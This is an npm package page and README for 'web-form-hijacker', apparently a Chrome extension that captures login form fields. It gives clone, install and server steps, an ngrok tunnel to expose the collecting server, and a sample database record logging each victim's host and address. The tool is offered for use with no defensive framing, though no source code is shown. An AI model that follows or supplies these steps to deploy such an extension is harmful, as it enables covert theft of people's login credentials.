1.1.2 • Published 8 years ago

web-form-hijacker v1.1.2

Weekly downloads
1
License
MIT
Repository
-
Last release
8 years ago

web-form-hijacker

form hijacking chrome extension

DownLoad

NPM VersionTotal downloadsLatest release
Alt textAlt textAlt text

Install

$ git clone https://github.com/u4bi-git/web-form-hijacker.git hi
$ cd hi
$ npm install

Usage

$ npm run server

Download ngrok (Because of SSL connection)

$ ./ngrok http 7777

Load unpacked extension (chrome://extensions)

Alt text

Login form field hijacking

Alt text

JSON DB

{
    "id"        : 1,
    "host"      : "www.example.com",
    "user_addr" : "0.0.0.0",
    ...etc
}

Alt text

Extension Icon

transparent color for the Icon

Alt text

License

MIT

1.1.2

8 years ago

1.1.1

8 years ago

1.1.0

8 years ago

1.0.6

8 years ago

1.0.5

8 years ago

1.0.4

8 years ago

1.0.3

8 years ago

1.0.2

8 years ago

1.0.1

8 years ago

1.0.0

8 years ago